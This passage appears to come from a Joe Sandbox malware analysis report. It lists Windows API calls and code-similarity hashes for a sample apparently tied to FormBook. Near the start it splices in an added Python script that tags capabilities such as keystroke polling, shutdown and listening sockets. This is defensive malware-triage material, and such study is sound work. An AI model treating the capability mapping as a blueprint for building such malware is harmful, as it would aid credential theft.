                                                                      • Instruction Fuzzy Hash: 8B21F2702002059FCB20EF68CC45A6EB7F8EF45320F248258E996E7395CBB9AD01DB61
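The function listings above (modifier-key polling via GetAsyncKeyState/GetKeyState, RegConnectRegistryW plus RegQueryValueExW, the FindFirstFileW/DeleteFileW/FindNextFileW loops, SeShutdownPrivilege followed by ExitWindowsEx, and socket/bind/listen) are the kind of per-function API sets an analyst skims to map capabilities. The script below is an added triage example, not Joe Sandbox code and not part of this report: it parses the report's "APIs" listing format into per-function API sets, tags each function against a small rule table, and decodes the literal virtual-key codes passed to the key-state calls (0xA0 VK_LSHIFT, 0xA1 VK_RSHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU, 0x5B VK_LWIN are the standard Windows values). The embedded input is constructed by copying API lines from three of the listings above; the rule names and the FunctionBlock structure are this example's own choices. One caveat a practitioner should carry: the report's signatures say the sample is likely a compiled AutoIt script, so functions like these are probably the AutoIt runtime's built-in keyboard, registry, file, shutdown and TCP routines, present in any compiled AutoIt binary; a tag therefore says what the embedded runtime can do, not what this script actually calls, and should be weighed against the behavioural findings (the FormBook Yara hit, the injection and credential-theft signatures) rather than read on its own.

```python
"""Capability triage over Joe Sandbox 'APIs' function listings.

Added example, not Joe Sandbox code. Rule names and the block structure are
this example's own; VK_* values are the standard Windows constants.
"""
import re
from dataclasses import dataclass, field

# Constructed input: API lines copied from three function listings in the report.
SAMPLE_REPORT = """\
APIs
• GetKeyboardState.USER32(?), ref: 01000097
• SetKeyboardState.USER32(?), ref: 01000102
• GetAsyncKeyState.USER32(000000A0), ref: 01000122
• GetKeyState.USER32(000000A0), ref: 01000139
• GetAsyncKeyState.USER32(00000011), ref: 010001A5
• GetAsyncKeyState.USER32(0000005B), ref: 01000213
Memory Dump Source
APIs
  • Part of subcall function 00FF87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FF882B
  • Part of subcall function 00FF87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FF8858
• ExitWindowsEx.USER32(?,00000000), ref: 010051F9
Strings
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 010162DC
• bind.WSOCK32(00000000,?,00000010), ref: 01016307
• listen.WSOCK32(00000000,00000005), ref: 01016316
Memory Dump Source
"""

# Standard Windows virtual-key codes for the literals seen in the report.
VK_NAMES = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
            0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}

# A rule fires when every listed API appears in one function's listing
# (subcall entries count: the report attributes them to this function).
CAPABILITY_RULES = {
    "keyboard-state polling": {"GetAsyncKeyState", "GetKeyState"},
    "directory walk with delete": {"FindFirstFileW", "FindNextFileW", "DeleteFileW"},
    "registry read (local or remote)": {"RegConnectRegistryW", "RegQueryValueExW"},
    "privileged shutdown": {"AdjustTokenPrivileges", "ExitWindowsEx"},
    "listening TCP socket": {"socket", "bind", "listen"},
}

# One "• Name.MODULE(args), ref: addr" line; the "Part of subcall function"
# prefix, the argument list and the comma before "ref:" are all optional
# (LIBCMT entries such as "_memmove.LIBCMT ref: ..." carry no parentheses).
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[\w@:]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)   # (name, module, args, ref, from_subcall)
    capabilities: list = field(default_factory=list)
    vkeys: list = field(default_factory=list)


def parse_blocks(text):
    """Split the report text at each 'APIs' header and collect its API lines."""
    blocks, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            current.apis.append((m["name"], m["mod"], args, m["ref"], m["sub"] is not None))
        elif stripped in ("Memory Dump Source", "Strings"):
            current = None  # end of this function's API listing
    return blocks


def triage(text):
    """Tag every parsed function with matching rules and decoded key codes."""
    blocks = parse_blocks(text)
    for block in blocks:
        names = {name for name, *_ in block.apis}
        block.capabilities = [cap for cap, need in CAPABILITY_RULES.items() if need <= names]
        for name, _mod, args, _ref, _sub in block.apis:
            # Only literal hex arguments can be decoded; '?' means unknown at analysis time.
            if name in ("GetAsyncKeyState", "GetKeyState") and args and args[0] != "?":
                code = int(args[0], 16)
                label = VK_NAMES.get(code, f"0x{code:02X}")
                if label not in block.vkeys:
                    block.vkeys.append(label)
    return blocks


if __name__ == "__main__":
    for i, block in enumerate(triage(SAMPLE_REPORT)):
        caps = ", ".join(block.capabilities) or "no rule matched"
        keys = f"  keys={','.join(block.vkeys)}" if block.vkeys else ""
        print(f"function {i}: {caps}{keys}")
```

Extending the rule table is the point of the structure: a rule is just a set of API names, so the clipboard listing above (OpenClipboard, GetClipboardData, EmptyClipboard, CloseClipboard) or the RegConnectRegistryW case can be added as one line each. Keep the "from_subcall" flag when you report results; the report's "Part of subcall function" entries are reached through a callee and are weaker evidence for the listed function than its own direct calls.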
                                                                      APIs
                                                                        • Part of subcall function 00FC0DB6: std::exception::exception.LIBCMT ref: 00FC0DEC
                                                                        • Part of subcall function 00FC0DB6: __CxxThrowException@8.LIBCMT ref: 00FC0E01
                                                                      • _memmove.LIBCMT ref: 00FF0258
                                                                      • _memmove.LIBCMT ref: 00FF036D
                                                                      • _memmove.LIBCMT ref: 00FF0414
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 1300846289-0
                                                                      • Opcode ID: 21c88c6d637a80b38bf28664c5561fb94ae78469d5a6b80d339aca4d70dc3004
                                                                      • Instruction ID: fdd47070f93ac904e1c825d2fc1e02fba07c7ae59848f0192ec23648cbcc4d57
                                                                      • Opcode Fuzzy Hash: 21c88c6d637a80b38bf28664c5561fb94ae78469d5a6b80d339aca4d70dc3004
                                                                      • Instruction Fuzzy Hash: 3402D0B1E00209DBCF04DF65D982ABEBBB5EF44310F148069E90ADB255EF39D911EB91
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00FA19FA
                                                                      • GetSysColor.USER32(0000000F), ref: 00FA1A4E
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00FA1A61
                                                                        • Part of subcall function 00FA1290: DefDlgProcW.USER32(?,00000020,?), ref: 00FA12D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ColorProc$LongWindow
                                                                      • String ID:
                                                                      • API String ID: 3744519093-0
                                                                      • Opcode ID: 070a6ceef8ad15ababdf7021e55c1766a8c71c112a15eb5c7a23b1fec9b611ff
                                                                      • Instruction ID: c3e663edd78890bb2f64e6557a88e02d1af836faf53754892dbc950fbb91915e
                                                                      • Opcode Fuzzy Hash: 070a6ceef8ad15ababdf7021e55c1766a8c71c112a15eb5c7a23b1fec9b611ff
                                                                      • Instruction Fuzzy Hash: EDA139F2506596FAE638AE288C54EBF355DFF473A1F1B010AF542D6291CA2D8D01F272
                                                                      APIs
                                                                        • Part of subcall function 01017D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01017DB6
                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0101679E
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 010167C7
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 01016800
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0101680D
                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 01016821
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 99427753-0
                                                                      • Opcode ID: c1bbb96f209f7b54e0e0f32b50e00ca9fdc7a440d641fe31455b71114a610f01
                                                                      • Instruction ID: 6cfb7f1789635b535ada9dd10bad53bc1e129618d9b8584ed97c0d503905c283
                                                                      • Opcode Fuzzy Hash: c1bbb96f209f7b54e0e0f32b50e00ca9fdc7a440d641fe31455b71114a610f01
                                                                      • Instruction Fuzzy Hash: D141C2B5A00210AFDB20BF248C86F6E77E8AF06754F44856CF955AB3C2DABC9D019791
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                      • String ID:
                                                                      • API String ID: 292994002-0
                                                                      • Opcode ID: b2b437dcf21eb78ce7e3cdb281c24e189f59d18302cb570cd24c4c53fcde7525
                                                                      • Instruction ID: 670a0f23cae3ec4601a8a73cd6053e49a11ea6c80efead6be667c0108bb3f382
                                                                      • Opcode Fuzzy Hash: b2b437dcf21eb78ce7e3cdb281c24e189f59d18302cb570cd24c4c53fcde7525
                                                                      • Instruction Fuzzy Hash: 7A11E7717001216FEB315F2ADC44AAEBBE9FF457A1F548068F9C5D3241CBB8D8018BA8
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FF80C0
                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FF80CA
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FF80D9
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FF80E0
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FF80F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: bd4a7b93057980619cdbcd1ef3a8a94ff87aef6d61f12688fce9da9daf9d447b
                                                                      • Instruction ID: 578e9a5683c6ad83ee1a43e7ad780f598e95dbb9a1a9d0869647d459ca5e1c0e
                                                                      • Opcode Fuzzy Hash: bd4a7b93057980619cdbcd1ef3a8a94ff87aef6d61f12688fce9da9daf9d447b
                                                                      • Instruction Fuzzy Hash: 3DF04431640205AFDB301E65DC8DE773BBCEF457E5B600115F645C6250CB659C42DB60
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 0100C432
                                                                      • CoCreateInstance.OLE32(01032D6C,00000000,00000001,01032BDC,?), ref: 0100C44A
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                      • CoUninitialize.OLE32 ref: 0100C6B7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                      • String ID: .lnk
                                                                      • API String ID: 2683427295-24824748
                                                                      • Opcode ID: 560cf9a0dc72b05bc1180724e91f81d568908c00de011e5880ff9217ad2e72d6
                                                                      • Instruction ID: 67e449088993bf2f5256eb27139dbd7f0f63f0c85d530651fbf58c068432dbe7
                                                                      • Opcode Fuzzy Hash: 560cf9a0dc72b05bc1180724e91f81d568908c00de011e5880ff9217ad2e72d6
                                                                      • Instruction Fuzzy Hash: 8FA13AB1108205AFD700EF54CC81EABB7ECEF89354F00492CF1959B1A2DBB5EA09CB52
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00FA4AD0), ref: 00FA4B45
                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FA4B57
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                      • API String ID: 2574300362-192647395
                                                                      • Opcode ID: 6c93e1cbb7fff1de9fc5b505fb4092ef12305daac6de52cb4339b59340677e09
                                                                      • Instruction ID: ebc6d9139b383b5e8a6f53b48b60b613de144aab02347c3165f29fce8eb69632
                                                                      • Opcode Fuzzy Hash: 6c93e1cbb7fff1de9fc5b505fb4092ef12305daac6de52cb4339b59340677e09
                                                                      • Instruction Fuzzy Hash: EAD01274A10723CFD7309F32D828B06B6F4AF867D1B21882DD4C5D6100D7B4E880C764
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: __itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 674341424-0
                                                                      • Opcode ID: 91ff10788f18e8d2e89022a1b4e990ea0d4bfd997d61c8d8aee2ce4f5d4df0c6
                                                                      • Instruction ID: 08c702879bec1227a199222c127bf9b3515c2ac70390ddda464b6b660e7b62ea
                                                                      • Opcode Fuzzy Hash: 91ff10788f18e8d2e89022a1b4e990ea0d4bfd997d61c8d8aee2ce4f5d4df0c6
                                                                      • Instruction Fuzzy Hash: 6022BC71A083419FC724DF25C881BAFB7E4AF85750F14492CF88A97291DB79E904EF92
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0101EE3D
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0101EE4B
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0101EF0B
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0101EF1A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                      • String ID:
                                                                      • API String ID: 2576544623-0
                                                                      • Opcode ID: 97a41d3164c7024e0ddc446e2201794add6b67a88f7c90242ff6bf7044a72acd
                                                                      • Instruction ID: 8b9c27e389488a9a139d51132f80ad4b3ff87cb0337bb0e80bc079e58a6f866f
                                                                      • Opcode Fuzzy Hash: 97a41d3164c7024e0ddc446e2201794add6b67a88f7c90242ff6bf7044a72acd
                                                                      • Instruction Fuzzy Hash: 59517EB15083019FD321EF24CC81E6BB7E8EF99750F50482DF99597291EB78E908DB92
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID:
                                                                      • API String ID: 3964851224-0
                                                                      • Opcode ID: 971384b3e65a9c85d70fb69b71c2f2342d868a3f688b173e31599dc20f861438
                                                                      • Instruction ID: 8c231c3f5693b8b76a500ba84f1866371867c8867b8f24bfb631d84414d0e412
                                                                      • Opcode Fuzzy Hash: 971384b3e65a9c85d70fb69b71c2f2342d868a3f688b173e31599dc20f861438
                                                                      • Instruction Fuzzy Hash: CA926771A083418FD720DF15C480B6BB7E1BF89314F14896DE88A9B262DB75EC45EF92
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00FFE628
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: lstrlen
                                                                      • String ID: ($|
                                                                      • API String ID: 1659193697-1631851259
                                                                      • Opcode ID: 8785a08b753f55fee2cbf299c4635e120bbca3a8e455963fafa330f0d97e4919
                                                                      • Instruction ID: 149df8bf2543ee9bca8f0b22553a161481a48c4b683cbf9f2434c7ef7a8ab6e6
                                                                      • Opcode Fuzzy Hash: 8785a08b753f55fee2cbf299c4635e120bbca3a8e455963fafa330f0d97e4919
                                                                      • Instruction Fuzzy Hash: FD322575A007099FD728DF19C481A6AB7F1FF48320B15C46EE99ADB3B1EB70A941CB44
                                                                      APIs
                                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0101180A,00000000), ref: 010123E1
                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 01012418
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                      • String ID:
                                                                      • API String ID: 599397726-0
                                                                      • Opcode ID: c6fda709ed6f027e5c01e4aafe66e724c6efeb9752376184ff635d14400ae359
                                                                      • Instruction ID: 40fcfb9d35cb994f4fadb2efd0f30e87e7003c9f165f655af39c649db3ae41bc
                                                                      • Opcode Fuzzy Hash: c6fda709ed6f027e5c01e4aafe66e724c6efeb9752376184ff635d14400ae359
                                                                      • Instruction Fuzzy Hash: FC41F57190420ABFEB20DE99DC81FBFB7FCEB40314F20806EF681A6145DB799E419660
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0100B343
                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0100B39D
                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0100B3EA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID:
                                                                      • API String ID: 1682464887-0
                                                                      • Opcode ID: c1d963658a03babd0889a57eb05c98ffc2c1654090f100d8e7d8ab5d5f59e3e4
                                                                      • Instruction ID: 93a38b8675a0c632efaa003dcd20690f2e92d263f3bc1f95a44e2608236fb40b
                                                                      • Opcode Fuzzy Hash: c1d963658a03babd0889a57eb05c98ffc2c1654090f100d8e7d8ab5d5f59e3e4
                                                                      • Instruction Fuzzy Hash: 98217175A00108EFDB00EFA5D881AEEBBB8FF49314F1480A9E945AB355CB359915DB50
                                                                      APIs
                                                                        • Part of subcall function 00FC0DB6: std::exception::exception.LIBCMT ref: 00FC0DEC
                                                                        • Part of subcall function 00FC0DB6: __CxxThrowException@8.LIBCMT ref: 00FC0E01
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FF882B
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FF8858
                                                                      • GetLastError.KERNEL32 ref: 00FF8865
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 1922334811-0
                                                                      • Opcode ID: 71ee924eb328685b82607134fce227d47b6d8915c19c05ce83a1b0c4cc7c4279
                                                                      • Instruction ID: cc4541fdd1177566859c255f19867f3249497925668762d8ec97a995f23bc5d7
                                                                      • Opcode Fuzzy Hash: 71ee924eb328685b82607134fce227d47b6d8915c19c05ce83a1b0c4cc7c4279
                                                                      • Instruction Fuzzy Hash: 2E1190B2814205AFD728DF54DC86D2BB7BCEF04750B20852EF45687201DE34AC41CB60
                                                                      APIs
                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FF8774
                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00FF878B
                                                                      • FreeSid.ADVAPI32(?), ref: 00FF879B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 3429775523-0
                                                                      • Opcode ID: 93623aaf9ce7e72fd68d521471ab13f71f6ca9bcf3e92edcba05ab7fdc68af1d
                                                                      • Instruction ID: 196c4cf03c57e68e66ffb3bed332c9bade4faf162af1df3ee70e19a749936297
                                                                      • Opcode Fuzzy Hash: 93623aaf9ce7e72fd68d521471ab13f71f6ca9bcf3e92edcba05ab7fdc68af1d
                                                                      • Instruction Fuzzy Hash: 20F03775A1120DBBDB10DEE49989AAEBBBCEF08211F5044A9EA01E2180E6796A048B50
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0100C6FB
                                                                      • FindClose.KERNEL32(00000000), ref: 0100C72B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: 1ecebf07e25952ff0210c3a5995965dd56c3dc9234a3b2f19809b9055168304e
                                                                      • Instruction ID: f9e2606664d6d792c24e02576c9b45fdc2800d22adeb4888a29862fe1fd269f7
                                                                      • Opcode Fuzzy Hash: 1ecebf07e25952ff0210c3a5995965dd56c3dc9234a3b2f19809b9055168304e
                                                                      • Instruction Fuzzy Hash: 0C11A1726046049FDB10DF29CC45A2AF7E8FF85324F44865DF9A9D7291DB78A805CB81
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,01019468,?,0102FB84,?), ref: 0100A097
                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,01019468,?,0102FB84,?), ref: 0100A0A9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFormatLastMessage
                                                                      • String ID:
                                                                      • API String ID: 3479602957-0
                                                                      • Opcode ID: e80a9bbb24e6a3536a99c01e3ac527bce5c990a0002f2a52cc0588bd5a55bcae
                                                                      • Instruction ID: 6cde32cfb1a9291c93bda04c682974366a99fcd48ea5ab13b54ee84b144b69b1
                                                                      • Opcode Fuzzy Hash: e80a9bbb24e6a3536a99c01e3ac527bce5c990a0002f2a52cc0588bd5a55bcae
                                                                      • Instruction Fuzzy Hash: 67F0823520532DBBDB21AEA4CC48FEA776DBF097A1F008156F949D7181D6349544CBA1
                                                                      APIs
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FF8309), ref: 00FF81E0
                                                                      • CloseHandle.KERNEL32(?,?,00FF8309), ref: 00FF81F2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 81990902-0
                                                                      • Opcode ID: 14d359a8c40a09cfec0ce3c38b97d13d2a425cb9adbd236d46dc166066018089
                                                                      • Instruction ID: 8650d691053d870b973c160b6a5e020fb3e2f85bb3c3de6c7a7fc6e2a4e04428
                                                                      • Opcode Fuzzy Hash: 14d359a8c40a09cfec0ce3c38b97d13d2a425cb9adbd236d46dc166066018089
                                                                      • Instruction Fuzzy Hash: 7EE0BF71010512EEE7352B60EC05E7777A9EF04350B24895DF595C4474DB666C91EB10
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FC8D57,?,?,?,00000001), ref: 00FCA15A
                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FCA163
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
